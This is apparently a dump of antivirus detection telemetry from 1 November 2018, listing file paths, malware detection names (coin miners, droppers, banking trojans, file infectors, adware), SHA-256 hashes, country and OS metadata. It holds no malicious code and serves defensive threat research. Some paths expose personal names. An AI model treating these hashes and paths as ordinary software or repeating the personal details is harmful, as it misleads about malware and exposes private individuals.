  Row(detection=Row(filename='avscan-20181101-180849-4cc1bb40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be41d322\\AVSCAN-20181101-180836-4A2E30D7\\AVSCAN-20181101-180849-4CC1BB40', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092521-bd13ff30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_568d7c96\\AVSCAN-20181101-092405-B51E7683\\AVSCAN-20181101-092521-BD13FF30', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='af6e53bb6691147dd7054dc2e928494c910a34df411098eb13378d234f56517f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\AF6E53BB6691147DD7054DC2E928494C910A34DF411098EB13378D234F56517F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='af6e53bb6691147dd7054dc2e928494c910a34df411098eb13378d234f56517f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5558c69b38c90e15bf8c5593bf113e0a026e41c563e379ef55af9d29cebd4431', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\5558C69B38C90E15BF8C5593BF113E0A026E41C563E379EF55AF9D29CEBD4431', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5558c69b38c90e15bf8c5593bf113e0a026e41c563e379ef55af9d29cebd4431', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111428-15060db2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111428-15060DB2', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012121-1cc2e3e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012121-1CC2E3E6', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143821-45e546f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143821-45E546F6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:38:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111443-16eeb712', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111443-16EEB712', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-232320-345ba5aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e4552d08\\AVSCAN-20181031-231129-DDA39FCC\\AVSCAN-20181031-232320-345BA5AA', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:23:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110605-5ff6c81f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-110548-5DC028B3\\AVSCAN-20181101-110605-5FF6C81F', filesize=2816000, name='TR/Crypt.CFI.Gen.#M1.#R1'), hash='d4c8083f289e16a5c13992bc54862e71bbc132c3f3a0ddc6e4c4741c531ad963', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:06:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000549-740650b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181102-000549-740650B8', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:05:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161357-e2c8177f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161357-E2C8177F', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='17a47a4fed25a13302f4391b35f928a044058cb35562ff1487f269af32f3a1a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vshub.exe', filepath='C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-01T18:33:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210756-1b033b9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2719552d\\AVSCAN-20181101-194621-414F84DB\\AVSCAN-20181101-210756-1B033B9F', filesize=11712000, name='ADWARE/Wajam.Gen4.#M1.#R1'), hash='6c2d55b3a669ad20cbdff998e63a2897a8868303eff9cda4554b7e866651bcf8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:09:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nclapi.dll', filepath='C:\\Program Files\\PC Connectivity Solution\\NclAPI.dll', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='269e8f80ea4b6fa2b82a0dc6c02b9ef7d515824722ad76eec58a85810b8be35f', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191432-e8f1dd5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7cec679\\AVSCAN-20181101-191409-E45D0FED\\AVSCAN-20181101-191432-E8F1DD5C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='brh.dll', filepath='C:\\Windows\\Temp\\nsm818.tmp\\brh.dll', filesize=960000, name='HEUR/AGEN.1034999.#M1.#R1'), hash='7643b17b3d571bd272f3284bf57eec71dac66c207f7602b0f063aec1c38aea92', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=9773272, timestamp='2018-11-01T23:16:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:12:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002558-4f28e347', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002558-4F28E347', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a00b8fc140d2cca735298eb29fe55636a49c7d30', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a00b8fc140d2cca735298eb29fe55636a49c7d30', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='60b7bb20b9a8a4074d137d89e7ef58646d1ac39fee6ef0c3b3d24f597818dc57', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:41:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-223742-623308fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e759919\\AVSCAN-20181101-223719-5EEFCE12\\AVSCAN-20181101-223742-623308FA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:37:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:56:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235840-35c8531b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181101-235840-35C8531B', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003409-845a6eaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003409-845A6EAF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:34:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gh injector - x86.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\temp1_gh injector v1.7_[unknowncheats.me]_.zip\\gh injector - x86.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='5d9e143b33ee81dbc877b631d537a656473b72cef25b09dbc16643d72eac13a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:51:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2b1c8b206267608617d200cfa1550cf96759b573a2b9cd53e817938a33e49a6c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2B1C8B206267608617D200CFA1550CF96759B573A2B9CD53E817938A33E49A6C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2b1c8b206267608617d200cfa1550cf96759b573a2b9cd53e817938a33e49a6c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:26:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210512-58a53522', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78b7b22e\\AVSCAN-20181101-205727-1A91A098\\AVSCAN-20181101-210512-58A53522', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:05:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='Z:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:34:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='blackshotnotification.exe', filepath='\\?\\J:\\BlackShot\\System\\BlackShotNotification.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='7e1b8579bf4cad1c1807615580ab29ff151848bd7667febd81294f53f488a704', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1516ee151f191b8231c4fc9c818de7af863619b7abc2d8a2a329eb5e35afd4f4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\1516EE151F191B8231C4FC9C818DE7AF863619B7ABC2D8A2A329EB5E35AFD4F4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1516ee151f191b8231c4fc9c818de7af863619b7abc2d8a2a329eb5e35afd4f4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:20:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:20:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8544.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8544.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:02:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\My Documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:52:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iffofqqb.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\IfFOfqQb.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mahanadi.exe', filepath='G:\\\xa0\\mahanadi\\mahanadi.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:21:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093835-bb2f9bdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093835-BB2F9BDD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:18:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\xmuk03x5h0d\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:19:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='certificazione delle competenze.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\MASTER\\CERTIFICAZIONE DELLE COMPETENZE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='carminati marco.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\CARMINATI MARCO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e394c91.vir', filepath='\\\\?\\C:\\Applications\\Service_1e394c91.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsrB02A.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T09:23:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='attbs 070718                                   .scr', filepath='E:\\Proyecto\\ATTBs 070718                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094130-dca485fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094130-DCA485FB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riqualifica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\RIQUALIFICA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-133737-b3439fa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_979978bb\\AVSCAN-20181101-114828-39806EC8\\AVSCAN-20181101-133737-B3439FA1', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='e6e84c26e6e540487262c987a40d0b375bc27032a101445842e8441bad6703cb', metadata=Row(cmdline=None, country='SB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bt4jr3xdfvw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\476924812.exe', parentsize=671232, timestamp='2018-11-01T11:30:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='programmi economia 2010-2011.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\MATERIALE DIDATTICO\\SORZI PROGRAMMI\\economia programmi\\programmi economia 2010-2011.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:30:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a57ad8f6d1c0e5112d307c282ea0763fa12e8fecb6aa64a7ba26d64df767e2b7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A57AD8F6D1C0E5112D307C282EA0763FA12E8FECB6AA64A7BA26D64DF767E2B7', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='a57ad8f6d1c0e5112d307c282ea0763fa12e8fecb6aa64a7ba26d64df767e2b7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:14:34Z'), dt=datetime.date(2018, 11, 1)),
